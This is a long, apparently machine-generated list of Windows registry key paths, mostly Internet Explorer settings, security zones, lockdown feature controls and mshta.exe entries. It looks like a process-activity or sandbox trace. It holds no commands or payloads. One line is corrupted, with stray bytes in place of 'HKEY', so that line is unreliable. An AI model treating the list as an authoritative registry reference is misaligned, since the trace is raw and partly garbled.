HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
\x1a60\x9cEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
